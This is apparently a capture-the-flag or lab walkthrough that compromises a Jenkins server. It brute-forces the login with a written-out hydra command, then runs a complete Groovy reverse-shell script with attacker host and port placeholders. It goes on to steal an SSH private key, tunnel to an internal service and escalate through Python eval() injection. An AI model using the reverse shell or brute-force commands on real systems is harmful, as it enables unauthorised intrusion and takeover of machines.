Nmap Scan
From nmap scan only two ports were open, 22 and 30609.
Port 22 seem to run default service which is ssh, but port 30609 was kinda weird to me and it was running http.
i decided to work on it .
So this port was running jenkins on it. As usual tried default credentials but it didn’t work. Also searched jenkins version see if i can CVE :), unfortunately there was no success on that.
Whenever i see a login page sql injection always come to mind, so i intercepted a request and i used sqlmap to test if i can get sql injection , also it didn’t work .
I tried to brute-force the login page for weak password, i made a first assumption that there is a user called admin or administrator and for the password part i decided to go with rockyou
I used burp-suite to intercept a request so that i can get proper format of the login request and it error, from that information now i can use hydra
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password"NOTE: users.txt contains only two users of my assumption which are admin and administrator
Hydra was able to find a correct combination of user and password
Actually i had no idea of getting a reverse shell after getting the admin panel, so i had to use my friend google for this one
Google came through, i found very awesome page explaining how to abuse jenkins https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
You can go and read it
Shortly, go to mange jenkins→script console and use the following script
String host="Attacker_IP";
int port=Attacker_PORT;
String cmd="bash"; //depending on the target's os
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Start a netcat listener and run the script
Privilege escalation
Checking home directory shows only one user
In juniordev home directory there is .ssh directory, but we cant list its contents, but its common tha id_rsa is found in .ssh directory so by trying to cat id_rsa content, we can read its contents.
By copying content of id_rsa to local machine, we can ssh as juniordev user
Using automated approach, Upload linpeas to the target machine to automatically find possible PrivEsc vectors . Using linpeas i found internal service running on port 8080
Simply by ssh tunnel, we can access that internal service
ssh -L 9000:127.0.0.1:8080 juniordev@10.150.150.38 -i id_rsa -fNAfter opening the address on the browser, we see a calculator , and it seems to python by reading the tittle
Simply the application is adding two numbers and give answer. since the tittle of the page says it is a python application, python uses eval() function to perform mathematical calculation.
Using article on how to exploit python application, we can find python code injection and get a reverse shell, you can read the article here: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
After getting reverse shell , it was root user :)
